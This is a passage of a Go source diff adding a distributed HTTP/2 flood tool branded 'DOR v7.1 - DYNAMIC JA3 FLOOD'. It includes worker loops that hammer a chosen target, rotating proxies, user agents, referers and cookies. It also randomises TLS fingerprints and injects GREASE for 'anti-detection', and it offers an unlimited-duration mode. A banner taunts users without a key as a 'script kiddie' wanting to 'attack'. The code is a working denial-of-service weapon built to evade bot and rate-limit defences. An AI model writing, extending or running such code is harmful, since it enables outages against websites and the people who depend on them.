+				tsUpdateCounter++
+				if tsUpdateCounter >= 100 {
+					timestampNano = strconv.FormatInt(time.Now().UnixNano(), 10)
+					tsUpdateCounter = 0
+				}
+				urlBuilder.WriteString("&_t=")
+				urlBuilder.WriteString(timestampNano)
+			}
+
+			fullURL := urlBuilder.String()
+
+			req, _ := http.NewRequest("GET", fullURL, nil)
+			req.Host = host
+
+			uaEntry := uaLoader.GetUA()
+			profile := headerTemplates[uaEntry.profileIdx]
+			referer := refererLoader.GetReferer()
+			cookie := cookieJar.Get(host)
+
+			req.Header = cloneHeaders(profile, uaEntry.ua, referer, proxyIP, rng, cookie)
+
+			reqStart := time.Now()
+			resp, err := transport.client.Do(req)
+			if err != nil {
+				atomic.AddUint64(&totalErrors, 1)
+				continue
+			}
+
+			latency := uint64(time.Since(reqStart).Milliseconds())
+			atomic.AddUint64(&totalLatency, latency)
+			atomic.AddUint64(&latencyCount, 1)
+
+			if resp.Body != nil {
+				if cookies := resp.Header.Get("Set-Cookie"); cookies != "" {
+					cookieJar.Set(host, cookies)
+				}
+				resp.Body.Close()
+			}
+
+			switch resp.StatusCode {
+			case 200, 201, 202, 204, 301, 302, 304:
+				atomic.AddUint64(&successRequests, 1)
+			case 429, 403, 503:
+				atomic.AddUint64(&blockedRequests, 1)
+				atomic.AddUint64(&totalErrors, 1)
+			default:
+				atomic.AddUint64(&successRequests, 1)
+			}
+		}
+	}
+}
+
+// ==================== STATS ====================
+type LiveStats struct {
+	Timestamp      string  `json:"timestamp"`
+	Target         string  `json:"target"`
+	Port           int     `json:"port"`
+	TotalRequests  uint64  `json:"total_requests"`
+	SuccessRate    float64 `json:"success_rate"`
+	AvgLatencyMs   uint64  `json:"avg_latency_ms"`
+	ElapsedSeconds float64 `json:"elapsed_seconds"`
+}
+
+func saveStats(target string, port int) {
+	stats := LiveStats{
+		Timestamp:      time.Now().Format(time.RFC3339),
+		Target:         target,
+		Port:           port,
+		TotalRequests:  atomic.LoadUint64(&totalRequests),
+		SuccessRate:    float64(atomic.LoadUint64(&successRequests)) / float64(atomic.LoadUint64(&totalRequests)+1) * 100,
+		ElapsedSeconds: time.Since(startTime).Seconds(),
+	}
+	jsonData, _ := json.MarshalIndent(stats, "", "  ")
+	os.WriteFile(STATS_FILE_PATH, jsonData, 0644)
+}
+
+func printStats(stopChan <-chan struct{}, duration int, isUnlimited bool) {
+	ticker := time.NewTicker(1 * time.Second)
+	defer ticker.Stop()
+
+	var lastReqs uint64
+	elapsed := 0
+
+	for {
+		select {
+		case <-stopChan:
+			return
+		case <-ticker.C:
+			elapsed++
+			currentReqs := atomic.LoadUint64(&totalRequests)
+			currentErrs := atomic.LoadUint64(&totalErrors)
+			currentBlocked := atomic.LoadUint64(&blockedRequests)
+
+			reqsPerSec := currentReqs - lastReqs
+			lastReqs = currentReqs
+			atomic.StoreUint64(&currentRPS, uint64(reqsPerSec))
+
+			successRate := float64(100)
+			if currentReqs+currentErrs > 0 {
+				successRate = float64(currentReqs) / float64(currentReqs+currentErrs) * 100
+			}
+
+			lc := atomic.LoadUint64(&latencyCount)
+			avgLat := uint64(0)
+			if lc > 0 {
+				avgLat = atomic.LoadUint64(&totalLatency) / lc
+			}
+
+			durationStr := fmt.Sprintf("%d/%ds", elapsed, duration)
+			if isUnlimited {
+				durationStr = fmt.Sprintf("Running: %ds", elapsed)
+			}
+
+			fmt.Printf("\r"+CYAN+"[%s]"+RESET+" Req: "+GREEN+"%d"+RESET+" (%d/s) "+CYAN+"|"+RESET+" Err: "+RED+"%d"+RESET+" "+CYAN+"|"+RESET+" Blocked: "+YELLOW+"%d"+RESET+" "+CYAN+"|"+RESET+" Success: "+GREEN+"%.1f%%"+RESET+" "+CYAN+"|"+RESET+" Latency: %dms",
+				durationStr, currentReqs, reqsPerSec, currentErrs, currentBlocked, successRate, avgLat)
+
+			if !isUnlimited && elapsed >= duration {
+				fmt.Println()
+				return
+			}
+		}
+	}
+}
+
+// ==================== UI ====================
+func drawHeader(target string, port, duration, workers, proxyCount, uaCount, refererCount int, isUnlimited bool) {
+	fmt.Println()
+	fmt.Println(RGB_RED + "  ╔══════════════════════════════════════════════════════════════╗" + RESET)
+	fmt.Println(RGB_RED + "  ║" + RESET + BOLD + RGB_GOLD + "      🚀 DOR v7.1 - DYNAMIC JA3 FLOOD 🚀           " + RESET + RGB_RED + "║" + RESET)
+	fmt.Println(RGB_RED + "  ║" + RESET + DIM + RGB_PURPLE + " Dynamic JA3 • 1000+ Unique Fingerprints       " + RESET + RGB_RED + "║" + RESET)
+	fmt.Println(RGB_RED + "  ╚══════════════════════════════════════════════════════════════╝" + RESET)
+	fmt.Println()
+	fmt.Println(BLUE + "  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" + RESET)
+	fmt.Printf(CYAN+"  🎯 Target     "+RESET+": %s:%d\n", target, port)
+
+	dur := fmt.Sprintf("%d seconds", duration)
+	if isUnlimited {
+		dur = "UNLIMITED (max)"
+	}
+	fmt.Printf(CYAN+"  ⏱️  Duration  "+RESET+": %s\n", dur)
+	fmt.Printf(CYAN+"  🧵 Workers   "+RESET+": %d\n", workers)
+	fmt.Printf(CYAN+"  📦 Batch     "+RESET+": %d requests\n", BATCH_SIZE)
+	fmt.Printf(CYAN+"  🌐 Protocol "+RESET+": HTTP/2 (TLS 1.3) [Dynamic JA3]\n")
+	fmt.Printf(CYAN+"  🎭 JA3       "+RESET+": ∞ Dynamic (1000+ unique profiles)\n")
+	fmt.Printf(CYAN+"  🔒 Ciphers   "+RESET+": %d (randomized per-connection)\n", len(dynamicCipherPool))
+	fmt.Printf(CYAN+"  📝 UA Count "+RESET+": %d (pre-computed profiles)\n", uaCount)
+	fmt.Printf(CYAN+"  🔗 Referer  "+RESET+": %d from referer.txt\n", refererCount)
+	fmt.Printf(CYAN+"  🍪 Cookies  "+RESET+": Session Support\n")
+
+	modeStr := "DIRECT"
+	if proxyCount > 0 {
+		modeStr = fmt.Sprintf("PROXY (%d proxies)", proxyCount)
+	}
+	fmt.Printf(CYAN+"  📦 Mode      "+RESET+": %s\n", modeStr)
+	fmt.Printf(CYAN+"  🚀 CPU Cores"+RESET+": %d\n", runtime.NumCPU())
+	fmt.Println(BLUE + "  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" + RESET)
+	fmt.Println()
+}
+
+func drawFinalReport(elapsed float64) {
+	fmt.Println()
+	fmt.Println()
+	fmt.Println(RGB_RED + "  ╔══════════════════════════════════════════════════════════════╗" + RESET)
+	fmt.Println(RGB_RED + "  ║" + RESET + BOLD + BRIGHT_CYAN + " ✅ COMPLETE ✅                                  " + RESET + RGB_RED + "║" + RESET)
+	fmt.Println(RGB_RED + "  ╠══════════════════════════════════════════════════════════════╣" + RESET)
+
+	total := atomic.LoadUint64(&totalRequests)
+	success := atomic.LoadUint64(&successRequests)
+	errs := atomic.LoadUint64(&totalErrors)
+	blocked := atomic.LoadUint64(&blockedRequests)
+	lc := atomic.LoadUint64(&latencyCount)
+	avgLat := uint64(0)
+	if lc > 0 {
+		avgLat = atomic.LoadUint64(&totalLatency) / lc
+	}
+
+	rps := float64(total) / elapsed
+	successRate := float64(100)
+	if total+errs > 0 {
+		successRate = float64(success) / float64(total+errs) * 100
+	}
+
+	fmt.Printf(RGB_RED+"  ║"+RESET+"  "+YELLOW+"🎯 Total Requests"+RESET+" : %-12d"+RGB_RED+"║\n"+RESET, total)
+	fmt.Printf(RGB_RED+"  ║"+RESET+"  "+GREEN+"✅ Successful"+RESET+"     : %-12d (%5.1f%%)"+RGB_RED+"║\n"+RESET, success, successRate)
+	fmt.Printf(RGB_RED+"  ║"+RESET+"  "+RED+"❌ Errors"+RESET+"         : %-12d"+RGB_RED+"║\n"+RESET, errs)
+	fmt.Printf(RGB_RED+"  ║"+RESET+"  "+RGB_ORANGE+"🚫 Blocked (429/403)"+RESET+" : %-12d"+RGB_RED+"║\n"+RESET, blocked)
+	fmt.Printf(RGB_RED+"  ║"+RESET+"  "+CYAN+"⚡ Avg RPS"+RESET+"        : %-12.0f"+RGB_RED+"║\n"+RESET, rps)
+	fmt.Printf(RGB_RED+"  ║"+RESET+"  "+BOLD+"⏱️  Latency (avg)"+RESET+"     : %-12d ms"+RGB_RED+"║\n"+RESET, avgLat)
+	fmt.Println(RGB_RED + "  ╚══════════════════════════════════════════════════════════════╝" + RESET)
+	fmt.Println()
+}
+
+// ==================== MAIN ====================
+func main() {
+	// ── SECRET KEY CHECK ──
+	validKeys := map[string]bool{
+		"夜影风暴": true, "量子幽灵": true, "暗影猎手": true, "虚空使者": true, "灵魂守卫": true,
+		"烈焰之心": true, "冰封王座": true, "雷霆之怒": true, "星辰大海": true, "深渊之眼": true,
+	}
+	execKey := os.Getenv("EXEC_KEY")
+	if execKey == "" || !validKeys[execKey] {
+		fmt.Println(`
+  ╔══════════════════════════════════════════════════════╗
+  ║                                                      ║
+  ║     ╔═╗╔═╗  ╔═╗╦ ╦╦╔═╗╔╗╔  ╔═╗╦═╗╦╔═╗               ║
+  ║     ╠═╝║╣   ║  ╠═╣║║ ║║║║  ║  ╠╦╝║╠═╝               ║
+  ║     ╩  ╚═╝  ╚═╝╩ ╩╩╚═╝╝╚╝  ╚═╝╩╚═╩╩                 ║
+  ║                                                      ║
+  ║   "你连钥匙都没有，还想攻击？"                       ║
+  ║   "You don't even have the key, and you want to      ║
+  ║    attack? LOL."                                     ║
+  ║                                                      ║
+  ║   → EXEC_KEY is missing or invalid                   ║
+  ║   → You are NOT Michelle Wang                        ║
+  ║   → Go home, script kiddie 🤡                        ║
+  ║                                                      ║
+  ╚══════════════════════════════════════════════════════╝
+`)
+		os.Exit(1)
+	}
+
+	runtime.GOMAXPROCS(runtime.NumCPU())
+
+
+	var target string
+	var port int
+	var timeArg string
+	var workers int
+	var proxyFile string
+	var customPath string // Custom path from target URL
+
+	if len(os.Args) >= 5 && !strings.Contains(os.Args[1], "://") {
+		rawTarget := os.Args[1]
+		// Parse target: example.com/path or example.com:443/path
+		if idx := strings.Index(rawTarget, "/"); idx != -1 {
+			target = rawTarget[:idx]
+			customPath = rawTarget[idx:]
+		} else {
+			target = rawTarget
+		}
+		// Remove port from target if present
+		if idx := strings.Index(target, ":"); idx != -1 {
+			target = target[:idx]
+		}
+		fmt.Sscanf(os.Args[2], "%d", &port)
+		timeArg = os.Args[3]
+		workers, _ = strconv.Atoi(os.Args[4])
+		if len(os.Args) >= 6 {
+			proxyFile = os.Args[5]
+		}
+	} else {
+		flag.StringVar(&target, "target", "", "Target")
+		flag.IntVar(&port, "port", 443, "Port")
+		flag.StringVar(&timeArg, "time", "60", "Duration")
+		flag.IntVar(&workers, "workers", 5000, "Workers")
+		flag.StringVar(&proxyFile, "proxy", "", "Proxy file")
+		flag.Parse()
+	}
+
+	if target == "" || port <= 0 {
+		fmt.Println(RED + BOLD + "  Usage: ./dor <target> <port> <duration> <threads>" + RESET)
+		fmt.Println(DIM + "  Example: ./dor example.com 443 60 5000" + RESET)
+		os.Exit(1)
+	}
+
+	duration := 60
+	isUnlimited := false
+	if timeArg == "max" || timeArg == "unlimited" || timeArg == "inf" {
+		isUnlimited = true
+	} else {
+		fmt.Sscanf(timeArg, "%d", &duration)
+		if duration <= 0 {
+			duration = 60
+		}
+	}
+
+	scheme := "https"
+	if port == 80 {
+		scheme = "http"
+	}
+
+	if proxyFile == "" {
+		for _, p := range []string{"proxy.txt", "./proxy.txt"} {
+			if _, err := os.Stat(p); err == nil {
+				proxyFile = p
+				break
+			}
+		}
+	}
+
+	initQueryParamPool()
+
+	uaLoader := NewUALoader(UA_FILE_PATH)
+	refererLoader := NewRefererLoader(REFERER_FILE_PATH)
+	proxyMgr := NewProxyManager(proxyFile)
+	cookieJar := new(CookieJar)
+	rateLearner := NewRateLearner(fmt.Sprintf("%s:%d", target, port))
+	headerTemplates := BuildHeaderTemplates()
+
+	// Init shared transport pool (4 transports, 1 per browser fingerprint)
+	initSharedTransports(target)
+
+	startTime = time.Now()
+
+	var fpNames []string
+	for _, fp := range browserFingerprints {
+		fpNames = append(fpNames, fp.name)
+	}
+
+	drawHeader(target, port, duration, workers, proxyMgr.Count(), uaLoader.Count(), refererLoader.Count(), isUnlimited)
+
+	fmt.Println(RGB_RED + "  " + BOLD + "🚀 INITIATING DYNAMIC JA3 FLOOD..." + RESET)
+	fmt.Println()
+	fmt.Println(BRIGHT_CYAN + "  [✓] Dynamic JA3 Engine (∞ unique fingerprints)" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] " + strconv.Itoa(len(dynamicCipherPool)) + " Cipher Suites (randomized per-connection)" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] " + strconv.Itoa(len(extensionPool)) + " TLS Extensions (dynamic ordering)" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] GREASE Injection (anti-detection)" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] Per-Worker Transport (no contention)" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] Header Templates (clone, not 15 Set calls)" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] Pre-computed UA Profiles (" + strconv.Itoa(uaLoader.Count()) + " entries)" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] Worker-Local Builders (no sync.Pool)" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] Query Param Pool (64 pre-generated)" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] HTTP/2 Multiplexing + TLS Session Cache" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] SO_REUSEPORT + TCP_NODELAY" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] Referer Rotation (" + strconv.Itoa(refererLoader.Count()) + " URLs)" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] Cookie Session Support" + RESET)
+	fmt.Println(BRIGHT_CYAN + "  [✓] Real-time Latency Tracking" + RESET)
+	fmt.Println()
+
+	if proxyMgr.Count() > 0 {
+		fmt.Println(YELLOW + "  ⚠️  PROXY MODE ACTIVE (" + strconv.Itoa(proxyMgr.Count()) + " proxies)" + RESET)
+		fmt.Println()
+	}
+
+	fmt.Println()
+
+	stopChan := make(chan struct{})
+	go printStats(stopChan, duration, isUnlimited)
+
+	var wg sync.WaitGroup
+
+	fmt.Println(RGB_RED + "  [" + BOLD + "FIRE" + RESET + RGB_RED + "]" + RESET + WHITE + " Starting flood with " + BOLD + YELLOW + strconv.Itoa(workers) + RESET + WHITE + " workers..." + RESET)
+	fmt.Println()
+
+	for i := 0; i < workers; i++ {
+		wg.Add(1)
+		go worker(i, target, port, scheme, customPath, proxyMgr, rateLearner, uaLoader, cookieJar, refererLoader, headerTemplates, &wg, stopChan)
+	}
+
+	if !isUnlimited {
+		time.Sleep(time.Duration(duration) * time.Second)
+	} else {
+		fmt.Println(CYAN + "  [INFO] Running in unlimited mode. Press Ctrl+C to stop." + RESET)
+	}
+
+	atomic.StoreInt32(&stopFlag, 1)
+	close(stopChan)
+
+	done := make(chan struct{})
+	go func() {
+		wg.Wait()
+		close(done)
+	}()
+
+	select {
+	case <-done:
+	case <-time.After(3 * time.Second):
+	}
+
+	drawFinalReport(time.Since(startTime).Seconds())
+}